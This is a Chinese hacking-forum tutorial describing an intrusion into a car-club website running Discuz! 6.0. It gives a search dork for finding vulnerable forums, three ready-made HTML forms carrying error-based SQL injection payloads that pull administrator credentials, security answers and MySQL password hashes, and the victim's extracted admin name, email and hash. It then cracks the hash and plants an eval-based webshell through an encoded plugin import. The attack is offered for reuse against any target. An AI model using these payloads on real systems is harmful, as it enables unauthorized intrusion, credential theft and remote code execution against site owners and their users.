HanDs
管理员

黑客渗透某“高大上”车友会网站 



 在乌云上看见有一个有关 Discuz! 6.0版本的  my.php文件的  SQL注入漏洞,究其原因是因为参数过滤不严格导致 SQL注入,本文主要就其实战利用方面进行了一些研究。

在实际利用过程需要对管理员进行定位,换句话说就是必须找出管理员的账号,有很多论坛都不是采用默认管理员即为 admin,而是修改为其它管理员,这时就要根据个人经验来获取了。根据本人经验主要有以下几种方法来获取:

(1)先注册一个用户,使用注册用户登录论坛,通过查看管理用户(高级版主,版主)发表帖子的地方,来获取管理员的 ID。

(2)查看论坛统计功能是否对普通用户或者游客开放,在统计模块中可以发现管理团队。

(3)获取版主权限,通过版主的权限来查看管理员的管理模块,比如内部管理等等,可以获取管理员的账号名称。

下面就一个实例来介绍 Discuz! 6.0版本的  my.php文件的  SQL注入漏洞的实际利用,获取管理员密码,并获取 webshell。

通过关键字寻找渗透目标

通过 Google搜索关键字“Powered  by Discuz!6.0”And“go”,目的是获取   Discuz!6.0版本的论坛,所示,对  Discuz!6.0版本进行搜索,随机选择一个搜索出来的记录,单击该链接访问网站。

黑客渗透某“高大上”车友会网站 渗透攻击 第1张

在论坛注册一个账号,注册一个测试帐号“testfcuk”,注册成功后使用该帐号进行登录。本次漏洞利用必须具有 user权限。

黑客渗透某“高大上”车友会网站 渗透攻击 第2张

编辑漏洞利用模板将以下代码保存为 html文件:

get admin info
<form method='post' action='http://www.xxxxxxxxx.net/my.php?item=buddylist'>
<input type='hidden' value="1111" name="descriptionnew[1' and(select 1 from(select
count(*),concat((select
concat(username,0x3a,password,0x3a,secques,0x3a,email)
from
cdb_members
where
adminid=1
limit
0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1#]" /><br />
<input type='submit' value='buddysubmit' name='buddysubmit' /><br />
</form>
get mysql user info
<form method='post' action='http://www.xxxxxxxxx.net/my.php?item=buddylist'>
<input type='hidden' value="1111" name="descriptionnew[1' and(select 1 from(select
count(*),concat((select (select (select concat(0x7e,user(),0x7e)    limit 0,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a) and 1=1#]" /><br />
<input type='submit' value='buddysubmit' name='buddysubmit' /><br />
</form>
get user salt,secques and password
<form method='post' action='http://www.xxxxxxxxx.net/my.php?item=buddylist'>
<input type='hidden' value="1111" name="descriptionnew[1' and(select 1 from(select
count(*),concat((select concat(user,0x3a,password,0x3a,salt,0x3a,secques,0x3a) from mysql.user
limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#]" /><br />
<input type='submit' value='buddysubmit' name='buddysubmit' /><br />
</form>

注意:目标网站不同则需要替换 form表单中的网站地址。打开该  html文件,所示,一共有三个提交按钮,分别是获取管理员信息,获取 mysql用户信息,获取指定用户的salt和安全验证码

黑客渗透某“高大上”车友会网站 渗透攻击 第3张

1)获取管理员信息

一般来讲默认 adminid=1就是管理员,但有些情况其值可能不是  1,因此需要对代码进行修改,使 adminid与实际的值匹配。比如  adminid为  2,则修改代码如下:

and(select 1 from(select
count(*),concat((select
concat(username,0x3a,password,0x3a,secques,0x3a,email)
from
cdb_members
where
adminid=2
1=1#]
limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and

2)获取 salt加密值

获取管理员或者某个用户 salt加密值,则可以利用下面代码:

descriptionnew[1' and(select 1 from(select count(*),concat((select
concat(user,0x3a,password,0x3a,salt,0x3a,secques,0x3a) from mysql.user limit
0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#]

获取管理密码加密等信息中单击第一个按钮获取管理员的基本信息,所示,获取信息如下:小凯:2459b24d9f663d2a4afa48374d63b8d1::chinaxxxxxxxxx@163.com1,用户名“小凯”,密码为“2459b24d9f663d2a4afa48374d63b8d1”,邮箱地址“chinaxxxxxxxxx@163.com”

黑客渗透某“高大上”车友会网站 渗透攻击 第4张

获取数据库信息回到漏洞利用页面,单击第二个按钮获取数据库相关信息,所示,数据库服务器“localhost”,用户名“xxxxxxxxx”

黑客渗透某“高大上”车友会网站 渗透攻击 第5张

进入管理后台将 MD5加密值在  cmd5.com进行查询,获取其加密密码,使用用户和密码进行登录,所示,顺利进入网站前台和后台。

 

黑客渗透某“高大上”车友会网站 渗透攻击 第6张


通过插件漏洞直接获取  webshell所示,在后台中先创建一个插件名称“webshell”,唯一标识符:“a']=eval($_POST[cmd]);$a['”,导入以下代码即可获取webshell:

YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIx
IjtzOjc6ImFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldFNo
ZWxsIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI2OiJhJ109ZXZhbCgkX1BPU1Rb
Y21kXSk7JGFbJyI7czoxMToiZGVzY3JpcHRpb24iO3M6MDoiIjtzOjEwOiJk
YXRhdGFibGVzIjtzOjA6IiI7czo5OiJkaXJlY3RvcnkiO3M6MDoiIjtzOjk6
ImNvcHlyaWdodCI7czowOiIiO3M6NzoibW9kdWxlcyI7czowOiIiO31zOjc6
InZlcnNpb24iO3M6NToiNi4wLjAiO30=

黑客渗透某“高大上”车友会网站 渗透攻击 第7张

Webshell的密码为cmd,webshell地址为:http://localhost/dz6.0/forumdata/cache/plugin_a']=eval($_POST[cmd]);$a['.php。通过插件漏洞直接获取Webshell,如图7所示,在浏览器中输入Webshell地址“http://www.xxxxxxxxx.net/forumdata/cache/plugin_a']=eval($_POST[cmd]);$a['.php”进行验证,Webshell成功获取,如图8所示为查看网站论坛配置文件config.inc.php内容

黑客渗透某“高大上”车友会网站 渗透攻击 第8张


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
黑客 渗透
#1楼
发帖时间:2016-9-7   |   查看数:0   |   回复数:2
我的奋斗
实习版主
WwW.fbisB.CoM 追逐梦想,万一实现了呢!

我的奋斗正在逛黑客教程网www.fbisb.com,学会了入侵网站找漏洞,奖励10个金币。网络就像罂粟,美丽如媚,危险如恶!



来自Android
2016-9-7 #2楼
潮鸣
不灭忍LV20
强无敌

2017-1-22 #3楼
游客组
快速回复